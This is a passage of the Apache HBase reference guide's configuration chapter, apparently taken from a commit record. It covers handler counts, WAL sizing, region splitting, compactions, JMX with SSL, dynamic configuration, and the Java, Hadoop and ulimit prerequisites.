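For example, to raise the handler count on a cluster that mostly serves small reads and writes (a sketch; the value is illustrative, and the default in recent releases is 30):\n\n[source,xml]\n----\n<property>\n <name>hbase.regionserver.handler.count<\/name>\n <value>60<\/value>\n<\/property>\n----\n\n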
The total size of the queries in progress is limited by the setting `hbase.ipc.server.max.callqueue.size`.\n\nIt is safe to set that number to the maximum number of incoming clients if their payload is small, the typical example being a cluster that serves a website since puts aren't typically buffered and most of the operations are gets.\n\nThe reason why it is dangerous to keep this setting high is that the aggregate size of all the puts that are currently happening in a region server may impose too much pressure on its memory, or even trigger an OutOfMemoryError.\nA RegionServer running on low memory will trigger its JVM's garbage collector to run more frequently up to a point where GC pauses become noticeable (the reason being that all the memory used to keep all the requests' payloads cannot be reclaimed, no matter how hard the garbage collector tries). After some time, the overall cluster throughput is affected since every request that hits that RegionServer will take longer, which exacerbates the problem even more.\n\nYou can get a sense of whether you have too few or too many handlers by enabling <<rpc.logging,rpc.logging>> on an individual RegionServer and then tailing its logs (queued requests consume memory).\n\n[[big_memory]]\n==== Configuration for large memory machines\n\nHBase ships with a reasonable, conservative configuration that will work on nearly all machine types that people might want to test with.\nIf you have larger machines -- an 8G or larger heap for HBase -- you might find the following configuration options helpful.\nTODO.\n\n[[config.compression]]\n==== Compression\n\nYou should consider enabling ColumnFamily compression.\nThere are several options that are near-frictionless and in almost all cases boost performance by reducing the size of StoreFiles and thus reducing I\/O.\n\nSee <<compression,compression>> for more information.\n\n[[config.wals]]\n==== Configuring the size and number of WAL files\n\nHBase uses <<wal,wal>> to recover the memstore data that has not been flushed to disk in case of an RS failure.\nThese WAL files should be configured to be slightly smaller than the HDFS block size (by default an HDFS block is 64Mb and a WAL file is ~60Mb).\n\nHBase also has a limit on the number of WAL files, designed to ensure there's never too much data that needs to be replayed during recovery.\nThis limit needs to be set according to memstore configuration, so that all the necessary data fits.\nIt is recommended to allocate enough WAL files to store at least that much data (when all memstores are close to full). 
For example, with a 16Gb RS heap, the default memstore setting (0.4), and the default WAL file size (~60Mb), the starting point for the WAL file count is 16384Mb * 0.4 \/ 60Mb ~= 109.\nHowever, as all memstores are not expected to be full all the time, fewer WAL files can be allocated.\n\n[[disable.splitting]]\n==== Managed Splitting\n\nHBase generally handles splitting of your regions based upon the settings in your _hbase-default.xml_ and _hbase-site.xml_ configuration files.\nImportant settings include `hbase.regionserver.region.split.policy`, `hbase.hregion.max.filesize`, and `hbase.regionserver.regionSplitLimit`.\nA simplistic view of splitting is that when a region grows to `hbase.hregion.max.filesize`, it is split.\nFor most usage patterns, you should use automatic splitting.\nSee <<manual_region_splitting_decisions,manual region splitting decisions>> for more information about manual region splitting.\n\nInstead of allowing HBase to split your regions automatically, you can choose to manage the splitting yourself.\nThis feature was added in HBase 0.90.0.\nManually managing splits works if you know your keyspace well, otherwise let HBase figure out where to split for you.\nManual splitting can mitigate region creation and movement under load.\nIt also makes region boundaries known and invariant (if you disable region splitting). If you use manual splits, it is easier to do staggered, time-based major compactions to spread out your network IO load.\n\n.Disable Automatic Splitting\nTo disable automatic splitting, you can set the region split policy in either the cluster configuration or the table configuration to be `org.apache.hadoop.hbase.regionserver.DisabledRegionSplitPolicy`.\n\n.Automatic Splitting Is Recommended\n[NOTE]\n====\nIf you disable automatic splits to diagnose a problem or during a period of fast data growth, it is recommended to re-enable them when your situation becomes more stable.\nThe potential benefits of managing region splits yourself are disputed.\n====\n\n.Determine the Optimal Number of Pre-Split Regions\nThe optimal number of pre-split regions depends on your application and environment.\nA good rule of thumb is to start with 10 pre-split regions per server and watch as data grows over time.\nIt is better to err on the side of too few regions and perform rolling splits later.\nThe optimal number of regions depends upon the largest StoreFile in your region.\nThe size of the largest StoreFile will increase with time if the amount of data grows.\nThe goal is for the largest region to be just large enough that the compaction selection algorithm only compacts it during a timed major compaction.\nOtherwise, the cluster can be prone to compaction storms with a large number of regions under compaction at the same time.\nIt is important to understand that data growth, not the manual split decision, causes compaction storms.\n\nIf the regions are split into too many large regions, you can increase the major compaction interval by configuring `HConstants.MAJOR_COMPACTION_PERIOD`.\nHBase 0.90 introduced `org.apache.hadoop.hbase.util.RegionSplitter`, which provides a network-IO-safe rolling split of all regions.\n\n[[managed.compactions]]\n==== Managed Compactions\n\nBy default, major compactions are scheduled to run once in a 7-day period.\nPrior to HBase 0.96.x, major compactions were scheduled to happen once per day by default.\n\nIf you need to control exactly when and how often major compaction runs, you can disable managed major compactions.\nSee the entry for 
`hbase.hregion.majorcompaction` in the <<compaction.parameters,compaction.parameters>> table for details.\n\n.Do Not Disable Major Compactions\n[WARNING]\n====\nMajor compactions are absolutely necessary for StoreFile clean-up.\nDo not disable them altogether.\nYou can run major compactions manually via the HBase shell or via the link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin API].\n====\n\nFor more information about compactions and the compaction file selection process, see <<compaction,compaction>>.\n\n[[spec.ex]]\n==== Speculative Execution\n\nSpeculative Execution of MapReduce tasks is on by default, and for HBase clusters it is generally advised to turn off Speculative Execution at the system level unless you need it for a specific case, where it can be configured per-job.\nSet the properties `mapreduce.map.speculative` and `mapreduce.reduce.speculative` to false.\n\n[[other_configuration]]\n=== Other Configurations\n\n[[balancer_config]]\n==== Balancer\n\nThe balancer is a periodic operation which is run on the master to redistribute regions on the cluster.\nIt is configured via `hbase.balancer.period` and defaults to 300000 (5 minutes).\n\nSee <<master.processes.loadbalancer,master.processes.loadbalancer>> for more information on the LoadBalancer.\n\n[[disabling.blockcache]]\n==== Disabling Blockcache\n\nDo not turn off block cache (you would do so by setting `hfile.block.cache.size` to zero). Currently we do not do well if you do this because the RegionServer will spend all its time loading HFile indices over and over again.\nIf your working set is such that block cache does you no good, at least size the block cache such that HFile indices will stay up in the cache (you can get a rough idea of the size you need by surveying RegionServer UIs; you'll see index block size accounted near the top of the webpage).\n\n[[nagles]]\n==== link:http:\/\/en.wikipedia.org\/wiki\/Nagle's_algorithm[Nagle's] or the small package problem\n\nIf an occasional delay of 40ms or so is seen in operations against HBase, try the Nagle's setting.\nFor example, see the user mailing list thread, link:http:\/\/search-hadoop.com\/m\/pduLg2fydtE\/Inconsistent+scan+performance+with+caching+set+&subj=Re+Inconsistent+scan+performance+with+caching+set+to+1[Inconsistent scan performance with caching set to 1] and the issue cited therein where setting `notcpdelay` improved scan speeds.\nYou might also see the graphs on the tail of link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7008[HBASE-7008 Set scanner caching to a better default] where our Lars Hofhansl tries various data sizes with Nagle's on and off, measuring the effect.\n\n[[mttr]]\n==== Better Mean Time to Recover (MTTR)\n\nThis section is about configurations that will make servers come back faster after a failure.\nSee the Devaraj Das and Nicolas Liochon blog post link:http:\/\/hortonworks.com\/blog\/introduction-to-hbase-mean-time-to-recover-mttr\/[Introduction to HBase Mean Time to Recover (MTTR)] for a brief introduction.\n\nThe issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-8389[HBASE-8354 forces Namenode into loop with lease recovery requests] is messy but has a bunch of good discussion toward the end on low timeouts and how to cause faster recovery, including citation of fixes added to HDFS. 
Read the Varun Sharma comments.\nThe configurations suggested below are Varun's suggestions, distilled and tested.\nMake sure you are running on a late-version HDFS so you have the fixes he refers to and himself added to HDFS that help HBase MTTR (e.g.\nHDFS-3703, HDFS-3712, and HDFS-4791 -- Hadoop 2 for sure has them and late Hadoop 1 has some). Set the following in the RegionServer.\n\n[source,xml]\n----\n<property>\n <name>hbase.lease.recovery.dfs.timeout<\/name>\n <value>23000<\/value>\n <description>How much time we allow to elapse between calls to recover lease.\n Should be larger than the dfs timeout.<\/description>\n<\/property>\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n----\n\nAnd on the NameNode\/DataNode side, set the following to enable 'staleness' introduced in HDFS-3703, HDFS-3912.\n\n[source,xml]\n----\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>dfs.datanode.socket.write.timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 8 * 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.timeout<\/name>\n <value>3000<\/value>\n <description>Down from 60 seconds to 3.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.max.retries.on.timeouts<\/name>\n <value>2<\/value>\n <description>Down from 45 seconds to 3 (2 == 3 retries).<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.read.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.stale.datanode.interval<\/name>\n <value>20000<\/value>\n <description>Down from default 30 seconds<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.write.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n----\n\n[[jmx_config]]\n==== JMX\n\nJMX (Java Management Extensions) provides built-in instrumentation that enables you to monitor and manage the Java VM.\nTo enable monitoring and management from remote systems, you need to set the system property `com.sun.management.jmxremote.port` (the port number through which you want to enable JMX RMI connections) when you start the Java VM.\nSee the link:http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/management\/agent.html[official documentation] for more information.\nHistorically, besides the port mentioned above, JMX opens two additional random TCP listening ports, which can lead to port conflicts. 
(See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10289[HBASE-10289] for details.)\n\nAs an alternative, you can use the coprocessor-based JMX implementation provided by HBase.\nTo enable it in 0.99 or above, add the following property to _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.regionserver.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nNOTE: DO NOT set `com.sun.management.jmxremote.port` for the Java VM at the same time.\n\nCurrently it supports the Master and RegionServer Java VMs.\nBy default, JMX listens on TCP port 10102; you can further configure the port using the properties below:\n\n[source,xml]\n----\n<property>\n <name>regionserver.rmi.registry.port<\/name>\n <value>61130<\/value>\n<\/property>\n<property>\n <name>regionserver.rmi.connector.port<\/name>\n <value>61140<\/value>\n<\/property>\n----\n\nThe registry port can be shared with the connector port in most cases, so you only need to configure `regionserver.rmi.registry.port`.\nHowever, if you want to use SSL communication, the two ports must be configured to different values.\n\nBy default, password authentication and SSL communication are disabled.\nTo enable password authentication, you need to update _hbase-env.sh_ as below:\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password_file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nSee the example password and access files under _$JRE_HOME\/lib\/management_.\n\nTo enable SSL communication with password authentication, follow the steps below:\n\n[source,bash]\n----\n#1. generate a key pair, stored in myKeyStore\nkeytool -genkey -alias jconsole -keystore myKeyStore\n\n#2. export it to file jconsole.cert\nkeytool -export -alias jconsole -keystore myKeyStore -file jconsole.cert\n\n#3. 
copy jconsole.cert to the jconsole client machine, import it to jconsoleKeyStore\nkeytool -import -alias jconsole -keystore jconsoleKeyStore -file jconsole.cert\n----\n\nThen update _hbase-env.sh_ as below:\n\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.ssl=true \\\n -Djavax.net.ssl.keyStore=\/home\/tianq\/myKeyStore \\\n -Djavax.net.ssl.keyStorePassword=your_password_in_step_1 \\\n -Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password_file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nFinally, start `jconsole` on the client using the key store:\n\n[source,bash]\n----\njconsole -J-Djavax.net.ssl.trustStore=\/home\/tianq\/jconsoleKeyStore\n----\n\nNOTE: To enable the HBase JMX implementation on the Master, you also need to add the following property to _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nThe corresponding properties for port configuration are `master.rmi.registry.port` (by default 10101) and `master.rmi.connector.port` (by default the same as the registry port).\n\n[[dyn_config]]\n== Dynamic Configuration\n\nSince HBase 1.0.0, it is possible to change a subset of the configuration without requiring a server restart.\nIn the HBase shell, there are new operators, `update_config` and `update_all_config`, that will prompt a server or all servers to reload configuration.\n\nOnly a subset of all configurations can currently be changed in the running server.\nHere are those configurations:\n\n.Configurations that support dynamic change\n[cols=\"1\",options=\"header\"]\n|===\n| Key\n| hbase.ipc.server.fallback-to-simple-auth-allowed\n| hbase.cleaner.scan.dir.concurrent.size\n| hbase.regionserver.thread.compaction.large\n| hbase.regionserver.thread.compaction.small\n| hbase.regionserver.thread.split\n| hbase.regionserver.throughput.controller\n| hbase.regionserver.thread.hfilecleaner.throttle\n| hbase.regionserver.hfilecleaner.large.queue.size\n| hbase.regionserver.hfilecleaner.small.queue.size\n| hbase.regionserver.hfilecleaner.large.thread.count\n| hbase.regionserver.hfilecleaner.small.thread.count\n| hbase.regionserver.flush.throughput.controller\n| hbase.hstore.compaction.max.size\n| hbase.hstore.compaction.max.size.offpeak\n| hbase.hstore.compaction.min.size\n| hbase.hstore.compaction.min\n| hbase.hstore.compaction.max\n| hbase.hstore.compaction.ratio\n| hbase.hstore.compaction.ratio.offpeak\n| hbase.regionserver.thread.compaction.throttle\n| hbase.hregion.majorcompaction\n| hbase.hregion.majorcompaction.jitter\n| hbase.hstore.min.locality.to.skip.major.compact\n| hbase.hstore.compaction.date.tiered.max.storefile.age.millis\n| hbase.hstore.compaction.date.tiered.incoming.window.min\n| hbase.hstore.compaction.date.tiered.window.policy.class\n| hbase.hstore.compaction.date.tiered.single.output.for.minor.compaction\n| hbase.hstore.compaction.date.tiered.window.factory.class\n| hbase.offpeak.start.hour\n| hbase.offpeak.end.hour\n| hbase.oldwals.cleaner.thread.size\n| hbase.procedure.worker.keep.alive.time.msec\n| hbase.procedure.worker.add.stuck.percentage\n| hbase.procedure.worker.monitor.interval.msec\n| hbase.procedure.worker.stuck.threshold.msec\n| hbase.regions.slop\n| hbase.regions.overallSlop\n| 
hbase.balancer.tablesOnMaster\n| hbase.balancer.tablesOnMaster.systemTablesOnly\n| hbase.util.ip.to.rack.determiner\n| hbase.ipc.server.max.callqueue.length\n| hbase.ipc.server.priority.max.callqueue.length\n| hbase.ipc.server.callqueue.type\n| hbase.ipc.server.callqueue.codel.target.delay\n| hbase.ipc.server.callqueue.codel.interval\n| hbase.ipc.server.callqueue.codel.lifo.threshold\n| hbase.master.balancer.stochastic.maxSteps\n| hbase.master.balancer.stochastic.stepsPerRegion\n| hbase.master.balancer.stochastic.maxRunningTime\n| hbase.master.balancer.stochastic.runMaxSteps\n| hbase.master.balancer.stochastic.numRegionLoadsToRemember\n| hbase.master.loadbalance.bytable\n| hbase.master.balancer.stochastic.minCostNeedBalance\n| hbase.master.balancer.stochastic.localityCost\n| hbase.master.balancer.stochastic.rackLocalityCost\n| hbase.master.balancer.stochastic.readRequestCost\n| hbase.master.balancer.stochastic.writeRequestCost\n| hbase.master.balancer.stochastic.memstoreSizeCost\n| hbase.master.balancer.stochastic.storefileSizeCost\n| hbase.master.balancer.stochastic.regionReplicaHostCostKey\n| hbase.master.balancer.stochastic.regionReplicaRackCostKey\n| hbase.master.balancer.stochastic.regionCountCost\n| hbase.master.balancer.stochastic.primaryRegionCountCost\n| hbase.master.balancer.stochastic.moveCost\n| hbase.master.balancer.stochastic.maxMovePercent\n| hbase.master.balancer.stochastic.tableSkewCost\n|===\n\nifdef::backend-docbook[]\n[index]\n== Index\n\/\/ Generated automatically by the DocBook toolchain.\nendif::backend-docbook[]\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. 
You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[configuration]]\n= Apache HBase Configuration\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter expands upon the <<getting_started>> chapter to further explain configuration of Apache HBase.\nPlease read this chapter carefully, especially the <<basic.prerequisites,Basic Prerequisites>>\nto ensure that your HBase testing and deployment goes smoothly, and prevent data loss.\nFamiliarize yourself with <<hbase_supported_tested_definitions>> as well.\n\n== Configuration Files\nApache HBase uses the same configuration system as Apache Hadoop.\nAll configuration files are located in the _conf\/_ directory, which needs to be kept in sync for each node on your cluster.\n\n.HBase Configuration File Descriptions\n_backup-masters_::\n Not present by default.\n A plain-text file which lists hosts on which the Master should start a backup Master process, one host per line.\n\n_hadoop-metrics2-hbase.properties_::\n Used to connect HBase Hadoop's Metrics2 framework.\n See the link:https:\/\/wiki.apache.org\/hadoop\/HADOOP-6728-MetricsV2[Hadoop Wiki entry] for more information on Metrics2.\n Contains only commented-out examples by default.\n\n_hbase-env.cmd_ and _hbase-env.sh_::\n Script for Windows and Linux \/ Unix environments to set up the working environment for HBase, including the location of Java, Java options, and other environment variables.\n The file contains many commented-out examples to provide guidance.\n\n_hbase-policy.xml_::\n The default policy configuration file used by RPC servers to make authorization decisions on client requests.\n Only used if HBase <<security,security>> is enabled.\n\n_hbase-site.xml_::\n The main HBase configuration file.\n This file specifies configuration options which override HBase's default configuration.\n You can view (but do not edit) the default configuration file at _docs\/hbase-default.xml_.\n You can also view the entire effective configuration for your cluster (defaults and overrides) in the [label]#HBase Configuration# tab of the HBase Web UI.\n\n_log4j.properties_::\n Configuration file for HBase logging via `log4j`.\n\n_regionservers_::\n A plain-text file containing a list of hosts which should run a RegionServer in your HBase cluster.\n By default this file contains the single entry `localhost`.\n It should contain a list of hostnames or IP addresses, one per line, and should only contain `localhost` if each node in your cluster will run a RegionServer on its `localhost` interface.\n\n.Checking XML Validity\n[TIP]\n====\nWhen you edit XML, it is a good idea to use an XML-aware editor to be sure that your syntax is correct and your XML is well-formed.\nYou can also use the `xmllint` utility to check that your XML is well-formed.\nBy default, `xmllint` re-flows and prints the XML to standard output.\nTo check for well-formedness and only print output if errors exist, use the command `xmllint -noout filename.xml`.\n====\n.Keep Configuration In Sync Across the Cluster\n[WARNING]\n====\nWhen running in distributed mode, after you make an edit to an HBase configuration, make 
sure you copy the contents of the _conf\/_ directory to all nodes of the cluster.\nHBase will not do this for you.\nUse `rsync`, `scp`, or another secure mechanism for copying the configuration files to your nodes.\nFor most configurations, a restart is needed for servers to pick up changes. Dynamic configuration is an exception to this, to be described later below.\n====\n\n[[basic.prerequisites]]\n== Basic Prerequisites\n\nThis section lists required services and some required system configuration.\n\n[[java]]\n.Java\n[cols=\"1,1,4\", options=\"header\"]\n|===\n|HBase Version\n|JDK 7\n|JDK 8\n\n|2.0\n|link:http:\/\/search-hadoop.com\/m\/YGbbsPxZ723m3as[Not Supported]\n|yes\n\n|1.3\n|yes\n|yes\n\n\n|1.2\n|yes\n|yes\n\n|===\n\nNOTE: HBase will neither build nor compile with Java 6.\n\nNOTE: You must set `JAVA_HOME` on each node of your cluster. _hbase-env.sh_ provides a handy mechanism to do this.\n\n[[os]]\n.Operating System Utilities\nssh::\n HBase uses the Secure Shell (ssh) command and utilities extensively to communicate between cluster nodes. Each server in the cluster must be running `ssh` so that the Hadoop and HBase daemons can be managed. You must be able to connect to all nodes via SSH, including the local node, from the Master as well as any backup Master, using a shared key rather than a password. You can see the basic methodology for such a set-up in Linux or Unix systems at \"<<passwordless.ssh.quickstart>>\". If your cluster nodes use OS X, see the section, link:https:\/\/wiki.apache.org\/hadoop\/Running_Hadoop_On_OS_X_10.5_64-bit_%28Single-Node_Cluster%29[SSH: Setting up Remote Desktop and Enabling Self-Login] on the Hadoop wiki.\n\nDNS::\n HBase uses the local hostname to self-report its IP address. Both forward and reverse DNS resolving must work in versions of HBase previous to 0.92.0. The link:https:\/\/github.com\/sujee\/hadoop-dns-checker[hadoop-dns-checker] tool can be used to verify DNS is working correctly on the cluster. The project `README` file provides detailed instructions on usage.\n\nLoopback IP::\n Prior to hbase-0.96.0, HBase only used the IP address `127.0.0.1` to refer to `localhost`, and this was not configurable.\n See <<loopback.ip,Loopback IP>> for more details.\n\nNTP::\n The clocks on cluster nodes should be synchronized. A small amount of variation is acceptable, but larger amounts of skew can cause erratic and unexpected behavior. Time synchronization is one of the first things to check if you see unexplained problems in your cluster. It is recommended that you run a Network Time Protocol (NTP) service, or another time-synchronization mechanism on your cluster and that all nodes look to the same service for time synchronization. See the link:http:\/\/www.tldp.org\/LDP\/sag\/html\/basic-ntp-config.html[Basic NTP Configuration] at [citetitle]_The Linux Documentation Project (TLDP)_ to set up NTP.\n\n[[ulimit]]\nLimits on Number of Files and Processes (ulimit)::\n Apache HBase is a database. It requires the ability to open a large number of files at once. Many Linux distributions limit the number of files a single user is allowed to open to `1024` (or `256` on older versions of OS X). You can check this limit on your servers by running the command `ulimit -n` when logged in as the user which runs HBase. See <<trouble.rs.runtime.filehandles,the Troubleshooting section>> for some of the problems you may experience if the limit is too low. 
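\n+\nA quick way to inspect the current limits is from the shell of the user that will run HBase; a minimal sketch (the exact +ulimit+ flags can vary slightly between shells and platforms):\n+\n[source,bash]\n----\n# soft and hard limits on the number of open files\nulimit -Sn\nulimit -Hn\n# limit on the number of user processes\nulimit -u\n----\n+\n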
You may also notice errors such as the following:\n+\n----\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Exception increateBlockOutputStream java.io.EOFException\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Abandoning block blk_-6935524980745310745_1391901\n----\n+\nIt is recommended to raise the ulimit to at least 10,000, but more likely 10,240, because the value is usually expressed in multiples of 1024. Each ColumnFamily has at least one StoreFile, and possibly more than six StoreFiles if the region is under load. The number of open files required depends upon the number of ColumnFamilies and the number of regions. The following is a rough formula for calculating the potential number of open files on a RegionServer.\n+\n.Calculate the Potential Number of Open Files\n----\n(StoreFiles per ColumnFamily) x (regions per RegionServer)\n----\n+\nFor example, assuming that a schema had 3 ColumnFamilies per region with an average of 3 StoreFiles per ColumnFamily, and there are 100 regions per RegionServer, the JVM will open `3 * 3 * 100 = 900` file descriptors, not counting open JAR files, configuration files, and others. Opening a file does not take many resources, and the risk of allowing a user to open too many files is minimal.\n+\nAnother related setting is the number of processes a user is allowed to run at once. In Linux and Unix, the number of processes is set using the `ulimit -u` command. This should not be confused with the `nproc` command, which controls the number of CPUs available to a given user. Under load, a `ulimit -u` that is too low can cause OutOfMemoryError exceptions. See Jack Levin's major HDFS issues thread on the hbase-users mailing list, from 2011.\n+\nConfiguring the maximum number of file descriptors and processes for the user who is running the HBase process is an operating system configuration, rather than an HBase configuration. It is also important to be sure that the settings are changed for the user that actually runs HBase. To see which user started HBase, and that user's ulimit configuration, look at the first line of the HBase log for that instance. A useful read setting config on your hadoop cluster is Aaron Kimball's Configuration Parameters: What can you just ignore?\n+\n.`ulimit` Settings on Ubuntu\n====\nTo configure ulimit settings on Ubuntu, edit _\/etc\/security\/limits.conf_, which is a space-delimited file with four columns. Refer to the man page for _limits.conf_ for details about the format of this file. In the following example, the first line sets both soft and hard limits for the number of open files (nofile) to 32768 for the operating system user with the username hadoop. The second line sets the number of processes to 32000 for the same user.\n----\nhadoop - nofile 32768\nhadoop - nproc 32000\n----\nThe settings are only applied if the Pluggable Authentication Module (PAM) environment is directed to use them. 
To configure PAM to use these limits, be sure that the _\/etc\/pam.d\/common-session_ file contains the following line:\n----\nsession required pam_limits.so\n----\n====\n\nLinux Shell::\n All of the shell scripts that come with HBase rely on the link:http:\/\/www.gnu.org\/software\/bash[GNU Bash] shell.\n\nWindows::\n Prior to HBase 0.96, running HBase on Microsoft Windows was limited only for testing purposes.\n Running production systems on Windows machines is not recommended.\n\n\n[[hadoop]]\n=== link:https:\/\/hadoop.apache.org[Hadoop](((Hadoop)))\n\nThe following table summarizes the versions of Hadoop supported with each version of HBase.\nBased on the version of HBase, you should select the most appropriate version of Hadoop.\nYou can use Apache Hadoop, or a vendor's distribution of Hadoop.\nNo distinction is made here.\nSee link:https:\/\/wiki.apache.org\/hadoop\/Distributions%20and%20Commercial%20Support[the Hadoop wiki] for information about vendors of Hadoop.\n\n.Hadoop 2.x is recommended.\n[TIP]\n====\nHadoop 2.x is faster and includes features, such as short-circuit reads, which will help improve your HBase random read profile.\nHadoop 2.x also includes important bug fixes that will improve your overall HBase experience. HBase does not support running with\nearlier versions of Hadoop. See the table below for requirements specific to different HBase versions.\n\nHadoop 3.x is still in early access releases and has not yet been sufficiently tested by the HBase community for production use cases.\n====\n\nUse the following legend to interpret this table:\n\n.Hadoop version support matrix\n\n* \"S\" = supported\n* \"X\" = not supported\n* \"NT\" = Not tested\n\n[cols=\"1,1,1,1\", options=\"header\"]\n|===\n| | HBase-1.2.x | HBase-1.3.x | HBase-2.0.x\n|Hadoop-2.0.x-alpha | X | X | X\n|Hadoop-2.1.0-beta | X | X | X\n|Hadoop-2.2.0 | X | X | X\n|Hadoop-2.3.x | X | X | X\n|Hadoop-2.4.x | S | S | X\n|Hadoop-2.5.x | S | S | X\n|Hadoop-2.6.0 | X | X | X\n|Hadoop-2.6.1+ | S | S | S\n|Hadoop-2.7.0 | X | X | X\n|Hadoop-2.7.1+ | S | S | S\n|Hadoop-2.8.[0-1] | X | X | X\n|Hadoop-2.8.2+ | NT | NT | NT\n|Hadoop-2.9.0 | X | X | X\n|Hadoop-3.0.0 | NT | NT | NT\n|===\n\n.Hadoop Pre-2.6.1 and JDK 1.8 Kerberos\n[TIP]\n====\nWhen using pre-2.6.1 Hadoop versions and JDK 1.8 in a Kerberos environment, HBase server can fail\nand abort due to Kerberos keytab relogin error. Late version of JDK 1.7 (1.7.0_80) has the problem too.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-10786[HADOOP-10786] for additional details.\nConsider upgrading to Hadoop 2.6.1+ in this case.\n====\n\n.Hadoop 2.6.x\n[TIP]\n====\nHadoop distributions based on the 2.6.x line *must* have\nlink:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-11710[HADOOP-11710] applied if you plan to run\nHBase on top of an HDFS Encryption Zone. Failure to do so will result in cluster failure and\ndata loss. This patch is present in Apache Hadoop releases 2.6.1+.\n====\n\n.Hadoop 2.y.0 Releases\n[TIP]\n====\nStarting around the time of Hadoop version 2.7.0, the Hadoop PMC got into the habit of calling out new minor releases on their major version 2 release line as not stable \/ production ready. As such, HBase expressly advises downstream users to avoid running on top of these releases. Note that additionally the 2.8.1 was release was given the same caveat by the Hadoop PMC. 
For reference, see the release announcements for link:https:\/\/s.apache.org\/hadoop-2.7.0-announcement[Apache Hadoop 2.7.0], link:https:\/\/s.apache.org\/hadoop-2.8.0-announcement[Apache Hadoop 2.8.0], link:https:\/\/s.apache.org\/hadoop-2.8.1-announcement[Apache Hadoop 2.8.1], and link:https:\/\/s.apache.org\/hadoop-2.9.0-announcement[Apache Hadoop 2.9.0].\n====\n\n.Replace the Hadoop Bundled With HBase!\n[NOTE]\n====\nBecause HBase depends on Hadoop, it bundles an instance of the Hadoop jar under its _lib_ directory.\nThe bundled jar is ONLY for use in standalone mode.\nIn distributed mode, it is _critical_ that the version of Hadoop that is out on your cluster match what is under HBase.\nReplace the hadoop jar found in the HBase lib directory with the hadoop jar you are running on your cluster to avoid version mismatch issues.\nMake sure you replace the jar in HBase across your whole cluster.\nHadoop version mismatch issues have various manifestations but often all look like its hung.\n====\n\n[[dfs.datanode.max.transfer.threads]]\n==== `dfs.datanode.max.transfer.threads` (((dfs.datanode.max.transfer.threads)))\n\nAn HDFS DataNode has an upper bound on the number of files that it will serve at any one time.\nBefore doing any loading, make sure you have configured Hadoop's _conf\/hdfs-site.xml_, setting the `dfs.datanode.max.transfer.threads` value to at least the following:\n\n[source,xml]\n----\n\n<property>\n <name>dfs.datanode.max.transfer.threads<\/name>\n <value>4096<\/value>\n<\/property>\n----\n\nBe sure to restart your HDFS after making the above configuration.\n\nNot having this configuration in place makes for strange-looking failures.\nOne manifestation is a complaint about missing blocks.\nFor example:\n\n----\n10\/12\/08 20:10:31 INFO hdfs.DFSClient: Could not obtain block\n blk_XXXXXXXXXXXXXXXXXXXXXX_YYYYYYYY from any node: java.io.IOException: No live nodes\n contain current block. Will get new block locations from namenode and retry...\n----\n\nSee also <<casestudies.max.transfer.threads,casestudies.max.transfer.threads>> and note that this property was previously known as `dfs.datanode.max.xcievers` (e.g. link:http:\/\/ccgtech.blogspot.com\/2010\/02\/hadoop-hdfs-deceived-by-xciever.html[Hadoop HDFS: Deceived by Xciever]).\n\n[[zookeeper.requirements]]\n=== ZooKeeper Requirements\n\nZooKeeper 3.4.x is 